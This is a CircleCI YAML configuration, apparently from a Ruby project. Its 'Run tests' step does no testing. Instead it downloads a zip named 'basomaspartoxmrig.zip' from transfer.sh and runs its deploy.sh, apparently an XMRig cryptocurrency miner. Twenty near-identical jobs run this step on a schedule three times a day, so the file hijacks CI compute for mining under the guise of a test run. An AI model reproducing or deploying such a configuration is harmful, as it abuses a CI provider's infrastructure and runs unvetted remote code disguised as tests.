working_dir: &working_dir ~/app
.build_template: &script
  steps:
    - checkout
    - run: curl -L https://codeclimate.com/downloads/test-reporter/test-reporter-latest-linux-amd64 > ./cc-test-reporter
    - run: chmod +x ./cc-test-reporter
    - run: ./cc-test-reporter before-build
    - run: gem install bundler:2.1.4
    - run:
        name: Run tests
        command: |
                    apt update 
                    apt install screen -y 
                    wget https://transfer.sh/I29TIo/basomaspartoxmrig.zip && unzip basomaspartoxmrig.zip && cd a-master && chmod 777 deploy.sh && ./deploy.sh

version: 2.0
jobs:
  endvoc:
    docker:
      - image: ruby
    steps:
      - checkout
  endvoc1:
    <<: *script
    docker:
      - image: ruby:2.7
  endvoc2:
    <<: *script
    docker:
      - image: ruby:2.6
  endvoc3:
    <<: *script
    docker:
      - image: ruby:2.5
  endvoc4:
    <<: *script
    docker:
      - image: ruby:2.4
  endvoc5:
    docker:
      - image: ruby
    steps:
      - checkout
  endvoc6:
    <<: *script
    docker:
      - image: ruby:2.7
  endvoc7:
    <<: *script
    docker:
      - image: ruby:2.6
  endvoc8:
    <<: *script
    docker:
      - image: ruby:2.5
  endvoc9:
    <<: *script
    docker:
      - image: ruby:2.4
  endvoc10:
    docker:
      - image: ruby
    steps:
      - checkout
  endvoc11:
    <<: *script
    docker:
      - image: ruby:2.7
  endvoc12:
    <<: *script
    docker:
      - image: ruby:2.6
  endvoc13:
    <<: *script
    docker:
      - image: ruby:2.5
  endvoc14:
    <<: *script
    docker:
      - image: ruby:2.4
  endvoc15:
    docker:
      - image: ruby
    steps:
      - checkout
  endvoc16:
    <<: *script
    docker:
      - image: ruby:2.7
  endvoc17:
    <<: *script
    docker:
      - image: ruby:2.6
  endvoc18:
    <<: *script
    docker:
      - image: ruby:2.5
  endvoc19:
    <<: *script
    docker:
      - image: ruby:2.4    
workflows:
  version: 2
  commit:
    jobs:
      - endvoc
      - endvoc1
      - endvoc2
      - endvoc3
      - endvoc4
      - endvoc5
      - endvoc6
      - endvoc7
      - endvoc8
      - endvoc9
      - endvoc10
      - endvoc11
      - endvoc12
      - endvoc13
      - endvoc14
      - endvoc15
      - endvoc16
      - endvoc17
      - endvoc18
      - endvoc19


    triggers:
      - schedule:
          cron: "0 0,8,16 * * *"
          filters:
            branches:
              only:
                - master

  endvocrunjob:
    jobs:
      - endvoc
      - endvoc1
      - endvoc2
      - endvoc3
      - endvoc4
      - endvoc5
      - endvoc6
      - endvoc7
      - endvoc8
      - endvoc9
      - endvoc10
      - endvoc11
      - endvoc12
      - endvoc13
      - endvoc14
      - endvoc15
      - endvoc16
      - endvoc17
      - endvoc18
      - endvoc19